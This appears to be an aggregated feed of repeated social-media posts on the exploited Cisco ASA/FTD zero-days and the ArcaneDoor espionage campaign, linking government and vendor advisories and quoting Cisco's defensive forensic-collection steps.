##The Canadian Centre for Cyber Security (CCCS) has a security advisory for the Cisco zero-days and exploitation. It includes background details from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommended actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The #Cisco vulns today smack a little of the Barracuda ones last year.
I really hope we don't end at "Toss these ASAs into a volcano."
#CVE_2024_20353 #CVE_2024_20359
@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-20353 and CVE-2024-20359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced them with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.
#Cisco #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #UAT4356 #threatintel
##The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.
It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.
#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw
##The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.
As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.
www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353
Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.
If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.
blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/
#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359
##Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities
Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release; Cisco's security advisory
Issue Summary
The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state-backed threat actors for espionage.
Technical Key Findings
CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.
Vulnerable Products
Impact Assessment
Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
Patches or Workaround
Cisco has released free software updates that address the vulnerability described in this advisory.
Tags
#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity
##Multiple government agencies have published an advisory on an ongoing APT campaign targeting Cisco ASA / FTD devices using the post-auth RCE bugs CVE-2024-20359 and CVE-2024-20358.
They don't know how the attackers initially got in.
Important note from the research published by Cisco Talos calling the APT operation* "ArcaneDoor":
> We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date. Our investigation is ongoing, and we will provide updates, if necessary, in the security advisories or on this blog.
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
##ArcaneDoor Attack (CVE-2024-20353 and CVE-2024-20359) https://fortiguard.fortinet.com/threat-signal-report/5429
##Hackers backdoored Cisco ASA devices via two zero-days (CVE-2024-20353, CVE-2024-20359) https://www.helpnetsecurity.com/2024/04/24/cve-2024-20353-cve-2024-20359/ #government-backedattacks #securityupdate #Don'tmiss #Microsoft #Hotstuff #firewall #0-day #Cisco #Lumen #News #CISA #NCSC
##@GossiTheDog Here are the CVE security advisories:
🚨🚨 two zero days in Cisco ASA AnyConnect under exploitation since last year
CVE-2024-20353 and CVE-2024-20359
##Wake up babe, new Cisco actively exploited zero days just dropped:
Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.
See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak
See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart
Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:
cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #KnownExploitedVulnerabilitiesCatalog #CISA #UAT4356 #threatintel #IOC
##Multiple government agencies has published an advisory on an ongoing APT campaign targeting Cisco ASA / FTD devices using post-auth RCE bug CVE-2024-20359 and CVE-2024-20358.
They don't know how the attackers initially got in.
Important note from the research published by Cisco Talos calling the APT operation* "ArcaneDoor":
> We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date. Our investigation is ongoing, and we will provide updates, if necessary, in the security advisories or on this blog.
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
##@GossiTheDog Here are the CVE security advisories:
🚨🚨 two zero days in Cisco ASA AnyConnect under exploitation since last year
CVE-2024-20353 and CVE-2024-20359
##updated 2024-04-26T15:22:27.803000
52 posts
2 repos
Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced them with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.
#Cisco #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #UAT4356 #threatintel
##The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.
It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.
#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw
##The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.
As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.
www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353
Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.
If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.
blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/
#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359
Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs
#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV
##So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:
DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)
"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."
This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.
What you should do is (I'll quote):
- Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
- Use the enable command to change into privileged EXEC mode. Note: On devices that are running Cisco FTD Software, the enable password is blank.
- Collect the outputs of the following commands:
    show version
    verify /SHA-512 system:memory/text
    debug menu memory 8
- Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.
Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from getting reinfected.
I will repeat (without shouting this time):
Patching is not a fix!
"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."
There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the Cisco advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't save anyone from reinfection either. But that's just me guessing.
#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity
Final question for anyone still reading: why the debug menu memory 8? What does it do?
I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:
cc: @todb @campuscodi @mttaggart @DaveMWilburn
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The Canadian Centre for Cyber Security (CCCS) has a security advisory for the Cisco zero-days and exploitation. It includes background details from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommended actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The #Cisco vulns today smack a little of the Barracuda ones last year.
I really hope we don't end at "Toss these ASAs into a volcano."
#CVE_2024_20353 #CVE_2024_20359
@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-20353 and CVE-2024-20359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities
Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release, Cisco's security advisory
Issue Summary
The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state-backed threat actors for espionage.
Technical Key Findings
CVE-2024-20353 involves the ASA and FTD management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.
Vulnerable Products
Impact Assessment
Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
Patches or Workaround
Cisco has released free software updates that address the vulnerabilities described in this advisory.
Tags
#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity
##Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities
Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory
Issue Summary
The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.
Technical Key Findings
CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.
Vulnerable Products
Impact Assessment
Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
Patches or Workaround
Cisco has released free software updates that address the vulnerability described in this advisory.
Tags
#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity
##Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.
#Cisco #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #UAT4356 #threatintel
##The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.
It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.
#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw
##The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.
As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.
www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353
Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.
If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.
blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/
#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359
Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs
#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV
##So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:
"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."
This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.
What you should do is (I'll quote):
- Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support
diagnostic-cli
command.- Use the
enable
command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.- Collect the outputs of the following commands:
show version
verify /SHA-512 system:memory/text
debug menu memory 8
- Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.
Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.
I will repeat (without shouting this time):
"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."
There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.
#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity
Final question for anyone still reading: why the debug menu memory 8
? What does it do?
I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:
cc: @todb @campuscodi @mttaggart @DaveMWilburn
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The #Cisco vulns today smack a little of the Barracuda ones last year.
I really hope we don't end at "Toss these ASAs into a volcano."
#CVE_2024_20353 #CVE_2024_20359
@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.
#Cisco #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #UAT4356 #threatintel
##The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.
It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.
#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw
##The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.
As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.
www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353
Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.
If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.
blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/
#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359
Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs
#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV
##So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:
DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)
"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."
This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.
What you should do is (I'll quote):
- Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support
diagnostic-cli
command.- Use the
enable
command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.- Collect the outputs of the following commands:
show version
verify /SHA-512 system:memory/text
debug menu memory 8
- Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.
Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.
I will repeat (without shouting this time):
Patching is not a fix!
"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."
There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.
#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity
Final question for anyone still reading: why the debug menu memory 8
? What does it do?
I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:
cc: @todb @campuscodi @mttaggart @DaveMWilburn
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The #Cisco vulns today smack a little of the Barracuda ones last year.
I really hope we don't end at "Toss these ASAs into a volcano."
#CVE_2024_20353 #CVE_2024_20359
@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities
Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory
Issue Summary
The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.
Technical Key Findings
CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.
Vulnerable Products
Impact Assessment
Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
Patches or Workaround
Cisco has released free software updates that address the vulnerability described in this advisory.
Tags
#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity
##ArcaneDoor Attack (CVE-2024-20353 and CVE-2024-20359) https://fortiguard.fortinet.com/threat-signal-report/5429
##Hackers backdoored Cisco ASA devices via two zero-days (CVE-2024-20353, CVE-2024-20359) https://www.helpnetsecurity.com/2024/04/24/cve-2024-20353-cve-2024-20359/ #government-backedattacks #securityupdate #Don'tmiss #Microsoft #Hotstuff #firewall #0-day #Cisco #Lumen #News #CISA #NCSC
##@GossiTheDog Here are the CVE security advisories:
🚨🚨 two zero days in Cisco ASA AnyConnect under exploitation since last year
CVE-2024-20353 and CVE-2024-20359
##Wake up babe, new Cisco actively exploited zero days just dropped:
Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.
See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak
See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart
Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:
cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #KnownExploitedVulnerabilitiesCatalog #CISA #UAT4356 #threatintel #IOC
##updated 2024-04-25T17:25:05.903000
2 posts
GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##updated 2024-04-24T21:31:56
4 posts
